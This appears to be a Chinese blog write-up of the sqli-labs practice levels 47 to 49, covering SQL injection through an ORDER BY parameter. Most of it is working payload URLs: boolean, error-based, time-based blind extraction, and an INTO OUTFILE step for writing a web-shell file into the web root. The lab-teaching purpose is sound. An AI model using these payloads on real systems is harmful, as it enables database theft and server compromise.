zoukankan      html  css  js  c++  java

  • SQL注入之Sqli-labs系列第四十七关,第四十八关,第四十九关(ORDER BY注入)

    0x1 源码区别点

    将id变为字符型:
    $sql = "SELECT * FROM users ORDER BY '$id'";

    0x2实例测试

    (1)and rand相结合的方式

    payload:
http://localhost/sqli-labs-master/Less-47/?sort=1' and rand(ascii(left(database(),1))=116)--+

    (2)利用报错的方式进行

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select 1 from(select count(*),concat(0x5c,database(),0x5c,floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    网上摘录语句:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3e,0x3e,(select database()),0x3e,0x3e,floor(rand()*2)) limit 0,1)--+

     

    (3)另类报错语句

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+

    (4)延迟注入 

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))--+

    (5)使用into outfile导出文件

    http://localhost:81/sqli-labs-master/Less-47/index.php?sort=1' into outfile "C:/testphp/Apache24/htdocs/sqli-labs-master/Less-47/test.txt"

    进行网马写入

    后面的十六进制是<? php phpinfo();?>

    0x3第四十八关

    这关和第四十七关的区别在于没有报错信息,也可以采用into outfile

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+

    0x4第四十九关

    这关和第四十七关的区别在于没有报错信息 

    http://192.168.232.135/sqli-labs-master/Less-49/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+
  • 相关阅读:
    关于spring中Assert的应用(方法入参检测工具类)
    索引与排序,重复索引与冗余索引,索引碎片与维护
    大数据量分页优化
    理想的索引
    索引覆盖
    聚簇索引
    mysql 索引
    表的优化与列类型选择
    mysql show profiles 使用分析sql 性能
    show processlist,sysbench压力测试工具
  • 原文地址:https://www.cnblogs.com/AmoBlogs/p/8725793.html
Copyright © 2011-2022 走看看